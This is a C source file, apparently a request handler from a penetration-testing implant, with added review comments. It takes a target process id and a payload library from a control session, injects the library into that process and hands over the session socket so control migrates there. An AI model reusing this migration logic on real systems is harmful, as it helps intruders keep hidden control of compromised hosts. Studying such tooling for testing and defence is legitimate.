#include "common.h"
#include "base_inject.h"
#include "passfd_server.h"
/*
 * Thread entry point that hands the session's transport socket to the
 * migrated process over the local socket named by the thread's second
 * parameter.
 *
 * thread->parameter1: pointer to the SOCKET to share.
 * thread->parameter2: path of the local socket passfd() connects through.
 *
 * Returns ERROR_INVALID_PARAMETER when either parameter is missing,
 * otherwise whatever passfd() reports for the handover.
 */
LONG passfd_thread(THREAD *thread) {
    SOCKET *fd_to_share = (SOCKET *)thread->parameter1;
    LPSTR path = (LPSTR)thread->parameter2;

    if (fd_to_share != NULL && path != NULL) {
        return passfd(*fd_to_share, path);
    }

    return ERROR_INVALID_PARAMETER;
}
/*
 * Handler for the core_migrate request.
 *
 * Reads the target pid and the migration library description from the
 * request TLVs, starts a helper thread (passfd_thread) that hands the
 * session's transport socket over the local socket path supplied in the
 * request, then injects the library into the target pid. Every exit path
 * transmits a response on the session before returning.
 *
 * remote: the active session; supplies the transport fd and receives the
 *         response.
 * packet: the request carrying the TLV_TYPE_MIGRATE_* values read below.
 *
 * Returns the error code of the step that failed (ERROR_INVALID_HANDLE,
 * EINVAL, or inject_library's result), or FALSE once injection and the
 * success response are done.
 */
DWORD
remote_request_core_migrate(Remote *remote, Packet *packet)
{
    char *sock_path;
    Packet * response = NULL;
    pid_t pid = 0;
    library l;
    DWORD result = 0;
    /* Local whose address is lent to the passfd thread below; it must not
     * go out of scope before that thread has been joined. */
    SOCKET orig_fd = 0;

    dprintf("[MIGRATE] Getting packet data");

    /* Built up front so each failure branch can transmit it. */
    response = packet_create_response(packet);

    /* NOTE(review): pid, arch, length, payload and entry/base addresses come
     * straight from the request; nothing in this function range-checks them
     * or checks for a missing TLV. Whether inject_library() validates the
     * library struct is not visible here — confirm before relying on it. */
    // Get the process identifier to inject into
    pid = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);
    // Get the target process architecture to inject into
    l.arch = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_ARCH);
    // Get the length of the library buffer
    l.length = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_LEN);
    // Receive the actual migration library buffer
    l.data = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_PAYLOAD);
    // Get the library entry point
    l.entry_point = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_ENTRY_POINT);
    // Get the library base address
    l.base_addr = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_BASE_ADDR);
    // Get the path for the local socket (may be NULL; passfd_thread rejects that)
    sock_path = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_SOCKET_PATH);

    /* NOTE(review): %d/%x assume int-sized fields; the types of pid_t and of
     * the library struct's length/base_addr/entry_point are not visible here —
     * verify they match, since a mismatch is undefined behaviour in the
     * variadic call. */
    dprintf("[MIGRATE] Migrating to %d, Arch: %d, Library Length: 0x%x, Library Base Address: 0x%x, Library Entry Point: 0x%x, Socket path : %s",
        pid,
        l.arch,
        l.length,
        l.base_addr,
        l.entry_point,
        sock_path);

    /* The transport fd that the migrated process will take over. */
    orig_fd = remote_get_fd(remote);

    dprintf("[MIGRATE] Creating passfd thread to share socket %d", orig_fd);

    /* parameter1 = &orig_fd, parameter2 = sock_path; see passfd_thread. */
    THREAD *socket_thread = thread_create((THREADFUNK)passfd_thread, &orig_fd, sock_path, NULL);

    if (!socket_thread) {
        dprintf("[MIGRATE] Failed to create the passfd thread");
        packet_transmit_response(ERROR_INVALID_HANDLE, remote, response);
        return ERROR_INVALID_HANDLE;
    }

    if (!thread_run(socket_thread)) {
        /* Thread never started, so no join is needed before destroying it. */
        thread_destroy(socket_thread);
        dprintf("[MIGRATE] Failed to run the passfd thread");
        packet_transmit_response(EINVAL, remote, response);
        return EINVAL;
    }

    /* Injection happens while the passfd thread is waiting to hand the
     * socket over. The thread's own return value (from passfd) is never
     * examined on either path below, so a failed handover with a successful
     * injection is still reported as success. */
    dprintf("[MIGRATE] Injecting library");
    result = inject_library(pid, &l);
    if (result != 0) {
        /* NOTE(review): the join here waits for passfd_thread even though
         * nothing will connect after a failed injection; whether passfd()
         * returns without a peer is not visible in this file — confirm it
         * cannot block this handler indefinitely. */
        thread_join(socket_thread);
        thread_destroy(socket_thread);
        packet_transmit_response(result, remote, response);
        return result;
    }

    /* Join before returning: the thread holds the address of orig_fd. */
    thread_join(socket_thread);
    thread_destroy(socket_thread);

    dprintf("[MIGRATE] return success");
    packet_transmit_response(ERROR_SUCCESS, remote, response);
    /* Returns FALSE rather than ERROR_SUCCESS; presumably both are 0 on this
     * platform — verify against common.h. */
    return FALSE;
}